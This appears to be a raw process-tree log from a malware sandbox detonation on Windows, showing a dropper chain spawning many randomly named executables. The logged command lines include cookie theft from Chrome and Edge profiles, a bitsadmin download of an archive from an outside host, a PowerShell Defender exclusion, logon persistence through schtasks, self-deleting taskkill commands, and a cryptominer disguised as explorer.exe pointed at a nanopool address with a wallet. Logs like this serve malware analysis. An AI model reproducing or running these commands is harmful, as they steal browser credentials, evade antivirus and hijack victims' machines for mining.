C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵PID:5668
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵PID:1084
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵PID:3556
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lt4y0e4d.liv\anyname.exe & exit10⤵PID:6580
-
C:\Users\Admin\AppData\Local\Temp\lt4y0e4d.liv\anyname.exeC:\Users\Admin\AppData\Local\Temp\lt4y0e4d.liv\anyname.exe11⤵PID:1900
-
C:\Users\Admin\AppData\Local\Temp\lt4y0e4d.liv\anyname.exe"C:\Users\Admin\AppData\Local\Temp\lt4y0e4d.liv\anyname.exe" -q12⤵PID:6708
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6708 -s 61213⤵
- Program crash
PID:1900
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vl5xt13d.ewq\cleanpro13.exe & exit10⤵PID:6304
-
C:\Users\Admin\AppData\Local\Temp\vl5xt13d.ewq\cleanpro13.exeC:\Users\Admin\AppData\Local\Temp\vl5xt13d.ewq\cleanpro13.exe11⤵PID:6156
-
C:\Users\Admin\Documents\3A6YukbTKpgRKbVd7jTkZUDI.exe"C:\Users\Admin\Documents\3A6YukbTKpgRKbVd7jTkZUDI.exe"12⤵PID:7092
-
-
C:\Users\Admin\Documents\U0Y0YKNIlEqdzGuVOYcdoS5u.exe"C:\Users\Admin\Documents\U0Y0YKNIlEqdzGuVOYcdoS5u.exe"12⤵PID:5452
-
C:\Users\Admin\Documents\U0Y0YKNIlEqdzGuVOYcdoS5u.exeC:\Users\Admin\Documents\U0Y0YKNIlEqdzGuVOYcdoS5u.exe13⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3036
-
-
C:\Users\Admin\Documents\U0Y0YKNIlEqdzGuVOYcdoS5u.exeC:\Users\Admin\Documents\U0Y0YKNIlEqdzGuVOYcdoS5u.exe13⤵PID:1508
-
-
-
C:\Users\Admin\Documents\IyZtvv29Lz7muSLVG76Sp6ik.exe"C:\Users\Admin\Documents\IyZtvv29Lz7muSLVG76Sp6ik.exe"12⤵PID:5440
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5440 -s 24013⤵
- Program crash
PID:6484
-
-
-
C:\Users\Admin\Documents\9nvXOf5x38_2JT_Q1i9GWbsC.exe"C:\Users\Admin\Documents\9nvXOf5x38_2JT_Q1i9GWbsC.exe"12⤵PID:5668
-
C:\Users\Admin\Documents\9nvXOf5x38_2JT_Q1i9GWbsC.exe"C:\Users\Admin\Documents\9nvXOf5x38_2JT_Q1i9GWbsC.exe" -q13⤵PID:7772
-
-
-
C:\Users\Admin\Documents\enFJQ3TgOX8dJh_pbrnSA6tN.exe"C:\Users\Admin\Documents\enFJQ3TgOX8dJh_pbrnSA6tN.exe"12⤵PID:5160
-
-
C:\Users\Admin\Documents\ctomSZA3hwOPFqW5jF0gMEN1.exe"C:\Users\Admin\Documents\ctomSZA3hwOPFqW5jF0gMEN1.exe"12⤵PID:6868
-
-
C:\Users\Admin\Documents\9za4DXufqNccSThTAZ8Swfje.exe"C:\Users\Admin\Documents\9za4DXufqNccSThTAZ8Swfje.exe"12⤵PID:3804
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3804 -s 24013⤵
- Program crash
PID:6696
-
-
-
C:\Users\Admin\Documents\odrrJ3Mi3jRotYBryF5Fuslp.exe"C:\Users\Admin\Documents\odrrJ3Mi3jRotYBryF5Fuslp.exe"12⤵PID:4044
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵PID:3524
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵PID:4828
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵PID:8156
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵PID:7468
-
-
-
C:\Users\Admin\Documents\dfAadjkHK4cB3nHlwZrjQk5I.exe"C:\Users\Admin\Documents\dfAadjkHK4cB3nHlwZrjQk5I.exe"12⤵PID:2876
-
C:\Users\Admin\AppData\Roaming\2783254.exe"C:\Users\Admin\AppData\Roaming\2783254.exe"13⤵PID:6940
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 6940 -s 210414⤵
- Program crash
PID:440
-
-
-
C:\Users\Admin\AppData\Roaming\1981202.exe"C:\Users\Admin\AppData\Roaming\1981202.exe"13⤵PID:5320
-
-
C:\Users\Admin\AppData\Roaming\3516890.exe"C:\Users\Admin\AppData\Roaming\3516890.exe"13⤵PID:5028
-
C:\Users\Admin\AppData\Roaming\3516890.exe"C:\Users\Admin\AppData\Roaming\3516890.exe"14⤵PID:2132
-
-
-
-
C:\Users\Admin\Documents\JKhhzunji8PQdSLHcCVEadQw.exe"C:\Users\Admin\Documents\JKhhzunji8PQdSLHcCVEadQw.exe"12⤵PID:1888
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1888 -s 29613⤵
- Program crash
PID:5800
-
-
-
C:\Users\Admin\Documents\ygtk80RcDORaaz8SS1KFvIBI.exe"C:\Users\Admin\Documents\ygtk80RcDORaaz8SS1KFvIBI.exe"12⤵PID:7164
-
C:\Users\Admin\Documents\ygtk80RcDORaaz8SS1KFvIBI.exe"C:\Users\Admin\Documents\ygtk80RcDORaaz8SS1KFvIBI.exe"13⤵PID:7000
-
-
C:\Users\Admin\Documents\ygtk80RcDORaaz8SS1KFvIBI.exe"C:\Users\Admin\Documents\ygtk80RcDORaaz8SS1KFvIBI.exe"13⤵PID:3872
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C taskkill /F /PID 3872 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\ygtk80RcDORaaz8SS1KFvIBI.exe"14⤵PID:3552
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /PID 387215⤵
- Kills process with taskkill
PID:5948
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C taskkill /F /PID 3872 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\ygtk80RcDORaaz8SS1KFvIBI.exe"14⤵PID:5568
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /PID 387215⤵
- Kills process with taskkill
PID:3340
-
-
-
-
-
C:\Users\Admin\Documents\SbEGxMWtazMk_llTT7tJAcmP.exe"C:\Users\Admin\Documents\SbEGxMWtazMk_llTT7tJAcmP.exe"12⤵PID:6948
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6948 -s 31613⤵
- Program crash
PID:3820
-
-
-
C:\Users\Admin\Documents\dHm8oDIfAR0s1xfSCiGKgWsV.exe"C:\Users\Admin\Documents\dHm8oDIfAR0s1xfSCiGKgWsV.exe"12⤵PID:5528
-
C:\Users\Admin\Documents\dHm8oDIfAR0s1xfSCiGKgWsV.exeC:\Users\Admin\Documents\dHm8oDIfAR0s1xfSCiGKgWsV.exe13⤵PID:8172
-
-
-
C:\Users\Admin\Documents\Tw3ZWEp14X67CqKzuCUbKNGj.exe"C:\Users\Admin\Documents\Tw3ZWEp14X67CqKzuCUbKNGj.exe"12⤵PID:7324
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7324 -s 23613⤵
- Program crash
PID:7724
-
-
-
C:\Users\Admin\Documents\ThlM6x9C9Hpsk2_XSWT_TgRR.exe"C:\Users\Admin\Documents\ThlM6x9C9Hpsk2_XSWT_TgRR.exe"12⤵PID:7424
-
C:\Users\Admin\Documents\ThlM6x9C9Hpsk2_XSWT_TgRR.exeC:\Users\Admin\Documents\ThlM6x9C9Hpsk2_XSWT_TgRR.exe13⤵PID:1548
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1548 -s 2814⤵
- Program crash
PID:7652
-
-
-
-
C:\Users\Admin\Documents\lMRak8Sy9JeJj8Dx84hTlUbN.exe"C:\Users\Admin\Documents\lMRak8Sy9JeJj8Dx84hTlUbN.exe"12⤵PID:7408
-
-
C:\Users\Admin\Documents\rLVAaTRhHGqkYq5jnbnn4IDj.exe"C:\Users\Admin\Documents\rLVAaTRhHGqkYq5jnbnn4IDj.exe"12⤵PID:7396
-
-
C:\Users\Admin\Documents\01fkSM24Sl5dH6cOcv1I39nF.exe"C:\Users\Admin\Documents\01fkSM24Sl5dH6cOcv1I39nF.exe"12⤵PID:7312
-
-
C:\Users\Admin\Documents\XGIaWpglKnGrcb9Ky72xVKdq.exe"C:\Users\Admin\Documents\XGIaWpglKnGrcb9Ky72xVKdq.exe"12⤵PID:7304
-
-
C:\Users\Admin\Documents\pGbd1hf97F_pVDyyTomaTFF_.exe"C:\Users\Admin\Documents\pGbd1hf97F_pVDyyTomaTFF_.exe"12⤵PID:7296
-
C:\Users\Admin\Documents\pGbd1hf97F_pVDyyTomaTFF_.exeC:\Users\Admin\Documents\pGbd1hf97F_pVDyyTomaTFF_.exe13⤵PID:7092
-
-
-
C:\Users\Admin\Documents\JSmKa8DI8JMGrmjM9GDwzbiL.exe"C:\Users\Admin\Documents\JSmKa8DI8JMGrmjM9GDwzbiL.exe"12⤵PID:7288
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7288 -s 29613⤵
- Program crash
PID:7488
-
-
-
C:\Users\Admin\Documents\cXjqbqDsxobbnfGNMq4eCR7G.exe"C:\Users\Admin\Documents\cXjqbqDsxobbnfGNMq4eCR7G.exe"12⤵PID:7280
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7280 -s 30413⤵
- Program crash
PID:3500
-
-
-
C:\Users\Admin\Documents\f7Y_tKFMjBvTWC3_zZv4h_Ey.exe"C:\Users\Admin\Documents\f7Y_tKFMjBvTWC3_zZv4h_Ey.exe"12⤵PID:7264
-
C:\Users\Admin\AppData\Local\Temp\09036c5a-5416-4218-9c41-62a158892109\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\09036c5a-5416-4218-9c41-62a158892109\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\09036c5a-5416-4218-9c41-62a158892109\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run13⤵PID:8116
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\09036c5a-5416-4218-9c41-62a158892109\test.bat"14⤵PID:4640
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Documents\f7Y_tKFMjBvTWC3_zZv4h_Ey.exe" -Force13⤵PID:4608
-
-
C:\Users\Admin\Documents\f7Y_tKFMjBvTWC3_zZv4h_Ey.exe"C:\Users\Admin\Documents\f7Y_tKFMjBvTWC3_zZv4h_Ey.exe"13⤵PID:4440
-
-
-
C:\Users\Admin\Documents\FZa2WmJFecjCd4DIyiwISrVd.exe"C:\Users\Admin\Documents\FZa2WmJFecjCd4DIyiwISrVd.exe"12⤵PID:7256
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"13⤵PID:7268
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7256 -s 28413⤵
- Program crash
PID:6016
-
-
-
C:\Users\Admin\Documents\ZVjbeWwgXBzFqwTvqVH_m8s6.exe"C:\Users\Admin\Documents\ZVjbeWwgXBzFqwTvqVH_m8s6.exe"12⤵PID:7248
-
C:\Users\Admin\Documents\ZVjbeWwgXBzFqwTvqVH_m8s6.exeC:\Users\Admin\Documents\ZVjbeWwgXBzFqwTvqVH_m8s6.exe13⤵PID:8104
-
-
-
C:\Users\Admin\Documents\YaqwWv0wVoGoaS2bipa7aQoE.exe"C:\Users\Admin\Documents\YaqwWv0wVoGoaS2bipa7aQoE.exe"12⤵PID:7240
-
C:\Users\Admin\Documents\YaqwWv0wVoGoaS2bipa7aQoE.exe"C:\Users\Admin\Documents\YaqwWv0wVoGoaS2bipa7aQoE.exe"13⤵PID:7880
-
-
-
C:\Users\Admin\Documents\64ze0BJTdebWfVXLANzzExSb.exe"C:\Users\Admin\Documents\64ze0BJTdebWfVXLANzzExSb.exe"12⤵PID:8000
-
C:\Users\Admin\AppData\Local\Temp\is-K7H3V.tmp\64ze0BJTdebWfVXLANzzExSb.tmp"C:\Users\Admin\AppData\Local\Temp\is-K7H3V.tmp\64ze0BJTdebWfVXLANzzExSb.tmp" /SL5="$20514,138429,56832,C:\Users\Admin\Documents\64ze0BJTdebWfVXLANzzExSb.exe"13⤵PID:4680
-
C:\Users\Admin\AppData\Local\Temp\is-GG83B.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-GG83B.tmp\Setup.exe" /Verysilent14⤵PID:836
-
-
-
-
C:\Users\Admin\Documents\bfb26UMp0McglsIpr8HayUI3.exe"C:\Users\Admin\Documents\bfb26UMp0McglsIpr8HayUI3.exe"12⤵PID:7648
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc88A6.tmp\tempfile.ps1"13⤵PID:7304
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc88A6.tmp\tempfile.ps1"13⤵PID:8144
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc88A6.tmp\tempfile.ps1"13⤵PID:1600
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc88A6.tmp\tempfile.ps1"13⤵PID:7828
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc88A6.tmp\tempfile.ps1"13⤵PID:6692
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc88A6.tmp\tempfile.ps1"13⤵PID:5700
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc88A6.tmp\tempfile.ps1"13⤵PID:1484
-
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://fsstoragecloudservice.com/data/data.7z C:\zip.7z13⤵
- Download via BitsAdmin
PID:7612
-
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pdWcKnymJD9UreYa -y x C:\zip.7z -o"C:\Program Files\temp_files\"13⤵PID:4228
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yngdyedj.ag5\askinstall52.exe & exit10⤵PID:6288
-
C:\Users\Admin\AppData\Local\Temp\yngdyedj.ag5\askinstall52.exeC:\Users\Admin\AppData\Local\Temp\yngdyedj.ag5\askinstall52.exe11⤵PID:5492
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5492 -s 164812⤵
- Program crash
PID:5380
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\y1yedw1h.z4h\63c02b4cb20e1de8569175aa65df628a.exe & exit10⤵PID:1096
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\f1yjgrmu.s3r\gcleaner.exe /mixfive & exit10⤵PID:5808
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zss5kruo.0f0\installer.exe /qn CAMPAIGN=654 & exit10⤵PID:3716
-
C:\Users\Admin\AppData\Local\Temp\zss5kruo.0f0\installer.exeC:\Users\Admin\AppData\Local\Temp\zss5kruo.0f0\installer.exe /qn CAMPAIGN=65411⤵PID:5932
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\oxtznrid.i0s\app.exe /8-2222 & exit10⤵PID:704
-
C:\Users\Admin\AppData\Local\Temp\oxtznrid.i0s\app.exeC:\Users\Admin\AppData\Local\Temp\oxtznrid.i0s\app.exe /8-222211⤵PID:240
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 240 -s 24012⤵
- Program crash
PID:5564
-
-
-
-
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"6⤵
- Executes dropped EXE
PID:4952 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4952 -s 2367⤵
- Program crash
PID:6408
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\GameBox.exe"C:\Program Files (x86)\GameBox INC\GameBox\GameBox.exe"6⤵
- Executes dropped EXE
PID:5924 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"' & exit7⤵PID:6576
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"'8⤵
- Creates scheduled task(s)
PID:7020
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"7⤵PID:1616
-
-
C:\Users\Admin\AppData\Roaming\Services.exe"C:\Users\Admin\AppData\Roaming\Services.exe"7⤵PID:7148
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"' & exit8⤵PID:6708
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"'9⤵
- Creates scheduled task(s)
- Suspicious use of SetWindowsHookEx
PID:6776
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"8⤵PID:2192
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-asia1.nanopool.org:14433 --user=42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s --pass= --cpu-max-threads-hint=50 --donate-level=5 --cinit-idle-wait=5 --cinit-idle-cpu=80 --nicehash --tls --cinit-stealth8⤵PID:6976
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\zhangfei.exe"C:\Program Files (x86)\GameBox INC\GameBox\zhangfei.exe"6⤵PID:3036
-
C:\Program Files (x86)\GameBox INC\GameBox\zhangfei.exe"C:\Program Files (x86)\GameBox INC\GameBox\zhangfei.exe" -a7⤵PID:6568
-
-
-
-
-
-
C:\Users\Admin\Documents\_0_9LvHWXMJdm_i5kN35w66W.exe"C:\Users\Admin\Documents\_0_9LvHWXMJdm_i5kN35w66W.exe"3⤵
- Executes dropped EXE
PID:6076 -
C:\Users\Admin\AppData\Roaming\4071221.exe"C:\Users\Admin\AppData\Roaming\4071221.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:6084 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 6084 -s 21365⤵
- Program crash
PID:5008
-
-
-
C:\Users\Admin\AppData\Roaming\4411936.exe"C:\Users\Admin\AppData\Roaming\4411936.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4116
-
-
C:\Users\Admin\AppData\Roaming\5642277.exe"C:\Users\Admin\AppData\Roaming\5642277.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4944 -
C:\Users\Admin\AppData\Roaming\5642277.exe"C:\Users\Admin\AppData\Roaming\5642277.exe"5⤵PID:2576
-
-
-
-
C:\Users\Admin\Documents\UnL57BIFzdiV2uzSGYBM8OE1.exe"C:\Users\Admin\Documents\UnL57BIFzdiV2uzSGYBM8OE1.exe"3⤵
- Executes dropped EXE
PID:2232 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2232 -s 2364⤵
- Program crash
PID:1068
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\md9_1sjm.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\md9_1sjm.exe"2⤵
- Executes dropped EXE
PID:2016
-
-
C:\Windows\system32\rUNdlL32.eXerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:3508 -
C:\Windows\SysWOW64\rundll32.exerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main2⤵
- Loads dropped DLL
PID:4584 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4584 -s 4563⤵
- Drops file in Windows directory
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4512
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 4584 -ip 45841⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Suspicious use of WriteProcessMemory
PID:3700
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3116
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4360 -ip 43601⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5320
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5420
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv R3q930x020WnyfI9gsy3Ow.0.21⤵
- Modifies data under HKEY_USERS
PID:5804
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 1012 -ip 10121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:468
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5464 -ip 54641⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1620
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5548 -ip 55481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4316
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 5524 -ip 55241⤵PID:5720
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵PID:2968
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 5648 -ip 56481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4152
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5996 -ip 59961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1192
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:1384
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
PID:1216
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 2232 -ip 22321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5652
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5696 -ip 56961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5256
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 5436 -ip 54361⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6364
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4952 -ip 49521⤵PID:6988
-
C:\Windows\system32\rUNdlL32.eXerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main1⤵
- Process spawned unexpected child process
PID:3584 -
C:\Windows\SysWOW64\rundll32.exerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main2⤵PID:7096
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7096 -s 4563⤵
- Program crash
PID:6164
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 7096 -ip 70961⤵PID:6508
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 616 -p 6084 -ip 60841⤵PID:6356
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 680 -ip 6801⤵PID:4276
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:2856
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 4F83E446F061F656826854CCC2E91C3C C2⤵PID:6340
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding A126DF12D614725717D315ED7D5F71D92⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:1068
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 39D255D6020F6183FB121F60E80EE6D1 C2⤵
- Blocklisted process makes network request
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1436
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"2⤵PID:7532
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default3⤵PID:1652
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"4⤵PID:3564
-
-
-
-
